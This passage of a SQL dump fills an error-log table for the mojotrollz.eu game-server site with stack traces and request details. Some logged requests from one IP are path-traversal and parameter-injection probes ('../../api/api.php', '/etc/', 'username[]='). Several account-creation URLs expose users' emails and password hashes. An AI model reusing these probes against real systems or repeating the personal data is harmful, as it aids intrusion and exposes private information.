`http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (898, 'Exception', 'The Barrens Razormane Mob doppelt Gespawned --> Richtiger Spawn: als Begleiter von Razormane Hunter', '3dac78c2ec2c8729553a04cef77c21cb817e7ac5', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 26, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'The Barrens Raz...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2015-01-05 20:14:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=The%20Barrens%20Razormane%20Mob%20doppelt%20Gespawned%20--%3E%20Richtiger%20Spawn:%20als%20Begleiter%20von%20Razormane%20Hunter', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 13, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (899, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1420416000000', 'f9be020eb9ebaf03033ff5c828c481a0b25af508', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.65.162', 0.048, '2015-01-30 23:01:26', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1420416000000', 'a:0:{}', 'http://mojotrollz.eu/index.php?p=server&sub=chars&page=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (901, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'button.png\' found.', '745323106d9f7f66a0c9b560cd0f631abc6836b7', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'button.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'button.png\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '66.249.64.94', 0.004, '2015-01-30 18:05:40', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=default_page&id=button.png', 'a:0:{}', '', 'Googlebot-Image/1.0', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:47:48'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (902, 'ERROR', 'Username Not available!', 'd4880166793293cfc243bbcbe977e77b81dcfb45', 1, '/home/mojotrolls/mojo_zero/src/web/mojotrollz/api/beta/Security.php', 12, '#0 /home/mojotrolls/mojo_zero/src/web/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'yonderlaya\', \'6e4990783ec531f...\', \'yonder19-06@hot...\', \'enUS\', false, true, \'Billaboradth\', \'9834849bc1a2495...\')\n#1 [internal function]: api_mojotrollz_beta::call_account_action_create(\'yonderlaya\', \'6e4990783ec531f...\', \'yonder19-06@hot...\', \'enUS\', \'Billaboradth\', \'9834849bc1a2495...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '186.92.90.209', 0.048, '2015-05-22 05:39:06', '85.10.198.18', 80, '/api.php?call=account&action=create&username=yonderlaya&password_sha=6e4990783ec531f41f656209f1d984219167479c&email=yonder19-06@hotmail.com&locale=enUS&betacode=Billaboradth&wow_password=9834849bc1a2495c7e13e1b4cffd0d05e33f49d1', 'a:0:{}', 'http://85.10.198.18/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36', 31, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (904, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: cat', '3bfb7db278d32b5989ee15463f9606e5101a53ef', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 151, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 10, \'files\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '207.46.13.101', 0.064, '2015-05-11 23:10:08', 'yeminy.org', 80, '/./api.php?call=files&cat=sys_js&id=system.js', 'a:0:{}', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 0, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (905, 'ERROR', 'Character Data incomplete', '9befd81fb43ec3748b65e4eb5662d02fe050f541', 1, '/home/mojotrolls/mojo_zero/src/web/mojotrollz/api/beta/Security.php', 19, '#0 /home/mojotrolls/mojo_zero/src/web/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'Nerro\', \'bf2d49eaf95867b...\', \'e.buls19@gmail....\', \'enUS\', false, true, \'edgarsnelien\', \'d3c7aecb1d9b9dd...\')\n#1 [internal function]: api_mojotrollz_beta::call_account_action_create(\'Nerro\', \'bf2d49eaf95867b...\', \'e.buls19@gmail....\', \'enUS\', \'edgarsnelien\', \'d3c7aecb1d9b9dd...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '212.93.100.108', 0.23601, '2015-05-16 20:57:06', 'mojotrollz.eu', 80, '/api.php?call=account&action=create&username=Nerro&password_sha=bf2d49eaf95867bff85727280edb18a312514281&email=e.buls19@gmail.com&locale=enUS&betacode=edgarsnelien&wow_password=d3c7aecb1d9b9dd9caa82a64b882f5e36a27d03d', 'a:0:{}', 'http://mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36', 0, b'0', 0, 8, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (906, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'sys_js\' found.', '1bb586ff7813422d60b86e7bf41c4af2c7513b93', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 15, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'sys_js\', \'system.js\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'sys_js\', \'system.js\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '66.249.69.198', 0.20801, '2015-03-10 06:25:55', 'hetzner.adiscon.com', 80, '/api.php?call=files&cat=sys_js&id=system.js', 'a:0:{}', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (907, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1425600000000', '881244333599dd8e9a5e31d27e437ec8b2a58cc0', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.64.190', 0.052, '2015-03-16 19:09:08', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1425600000000', 'a:0:{}', 'http://mojotrollz.eu/index.php?p=server&sub=chars&page=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:48:00'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (909, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1428192000000', '4348136c892f4901aee186f401738e7cb113ed9b', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.67.11', 0.112, '2015-04-14 09:16:36', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1428192000000', 'a:0:{}', 'http://www.mojotrollz.eu/index.php?p=server&sub=chars&page=10', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:48:04'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (910, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1430784000000', '8284e197a3ada49f5fcc1dffc8c81c0e52dc663f', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.69.19', 0.044, '2015-05-13 04:31:41', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1430784000000', 'a:0:{}', 'http://www.mojotrollz.eu/index.php?p=server&sub=chars&page=5', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (911, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: password_md5 Verifier: STRING', 'b24077ed7b40073053ea8606e36bf871f913a662', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 156, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 11, \'login\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.056, '2015-05-16 20:32:58', 'mojotrollz.eu', 80, '/api.php?call=account&action=login&username=vextacular&password_sha=8704af068f37cb5fc44d947cb875c5ac0bfe0a54&password_md5[]=', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (912, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: username Verifier: STRING', 'df95a31a628b214981015d6b23046442b76c9fdd', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 156, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 11, \'login\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.004, '2015-05-16 20:28:16', 'mojotrollz.eu', 80, '/api.php?call=account&action=login&username[]=&password_sha=8704af068f37cb5fc44d947cb875c5ac0bfe0a54&password_md5=f8d0494a6aeb1f2b36fcc660e21d1abd', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:48:09'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (913, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call_account', '34bd37910c7cdc1f046a8cd07cf8246793665f66', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call_account\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.016, '2015-05-16 20:28:27', 'mojotrollz.eu', 80, '/api.php?call=account', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:48:13'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (914, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'/etc/\' found.', '125c51b5a4c01925110801e60d0b7a3778365694', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'sys\', \'/etc/\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'sys\', \'/etc/\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '199.19.94.16', 0.004, '2015-05-16 20:28:55', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=/etc/', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:48:27'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (915, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'default\' found.', 'af46c74d213fda319eba172db43060dbc011cc9b', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 15, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default\', \'\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default\', \'\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '199.19.94.16', 0.008, '2015-05-16 20:31:04', 'mojotrollz.eu', 80, '/api.php?call=files&cat=default&id=', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (916, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'../../api/api.php\' found.', 'bf529a20e41736cfb4777b798c3c916f4e7187b4', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'sys\', \'../../api/api.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'sys\', \'../../api/api.p...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '199.19.94.16', 0.008, '2015-05-16 20:33:47', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=../../api/api.php', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (917, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'..\\/..\\/api\\/api.php\' found.', 'baf887753d83694c7d675137da06df5c39d18bc8', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'sys\', \'..\\\\/..\\\\/api\\\\/ap...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'sys\', \'..\\\\/..\\\\/api\\\\/ap...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '199.19.94.16', 0.008, '2015-05-16 20:33:58', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=..\\/..\\/api\\/api.php', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:47:38'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (918, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: menu Verifier: INT', '1a268d3d243507e25a0b19ab4c46c8168d121a5d', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 156, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 1, \'user_achievemen...\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/mojotrolls/mojo_zero/src/web/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#2 {main}', '199.19.94.16', 0.004, '2015-05-16 20:35:44', 'mojotrollz.eu', 80, '/?page=user_achievements_menu_sub&menu=&', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (919, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: page; value: ', '30e2c43e619ef43706956707f9d6540d1a605afb', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#2 {main}', '199.19.94.16', 0.004, '2015-05-16 20:35:50', 'mojotrollz.eu', 80, '/?page=&menu=0&', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (920, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1431801367482', 'd5c3682e594962db20c6283e20d80587f1ab2446', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:36:01', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1431801367482', 'a:0:{}', 'http://mojotrollz.eu/?page=a&menu=0&', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:50:01'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (921, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1431801372480', 'a32cd4f1b3bf2736aa1f56f54b5d875a0f305c47', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.012, '2015-05-16 20:36:06', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1431801372480', 'a:0:{}', 'http://mojotrollz.eu/?page=b&menu=0&', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:50:04'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (922, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1431801386944', 'deaac0b71b0f74fe7bcc9a9661728e9a15f8d403', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.016, '2015-05-16 20:36:21', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1431801386944', 'a:0:{}', 'http://mojotrollz.eu/?page=asdf&menu=0&', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:49:55'); INSERT INTO 